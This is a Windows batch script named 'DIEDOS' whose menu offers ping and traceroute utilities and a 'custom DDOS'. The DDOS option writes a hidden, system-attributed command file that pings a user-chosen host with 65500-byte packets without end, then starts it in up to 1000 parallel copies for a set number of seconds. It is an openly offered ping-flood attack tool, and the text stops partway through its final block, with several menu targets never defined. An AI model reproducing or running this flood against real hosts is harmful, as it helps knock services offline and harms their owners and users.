@echo off
:menu
cls
title DIEDOS
set filename= Default
color a
echo 		                     BY WWWQR (wieger)
echo.
echo		1=ping test/ 2=website tracer / 3=custom DDOS / 4=ip locator / 5=exit:
set /p picker= ">"
if %picker% == 1 goto 1
if %picker% == 2 goto 2
if %picker% == 3 goto 3
if %picker% == 4 goto 4
if %picker% == 5 goto 5
if not %picker% == 5 goto false


:1
@echo off
cls
echo IP or webdomain:
set /p IP= https://
ping %IP% -t -l 0

:2
@echo off
cls
echo IP or webdomain:
set /p IP1= "https://"
tracert %IP1%
pause

:3
@echo off
cls
echo IP or webdomain:
set /p IP2= "https://"
echo color a>%IP2%.cmd
echo ping %IP2% -t -l 65500>>%IP2%.cmd
attrib +h +s %IP2%.cmd
cls
echo 		How Many Threads?: 1=5/2=10/3=20/4=40/5=100/6=255/7=500/8=1000:
set /p Threads= ">"
cls
echo 		How many seconds Is the Attack?:
set /p Time= ">"
cls
if %Threads% == 1 goto 1t
if %Threads% == 2 goto 2t
if %Threads% == 3 goto 3t
if %Threads% == 4 goto 4t
if %Threads% == 5 goto 5t
if %Threads% == 6 goto 6t
if %Threads% == 7 goto 7t
if %Threads% == 8 goto 8t
if not %Threads% == 8 goto false

:1t
@echo off
timeout 2
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit


:2t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:3t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:4t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:5t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:6t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:7t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
timeout %Time%
del %IP2%.cmd
TASKKILL /IM PING.EXE -f
timeout 5
goto EndString
exit

:8t
@echo off
timeout 2
cls
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
start %IP2%.cmd
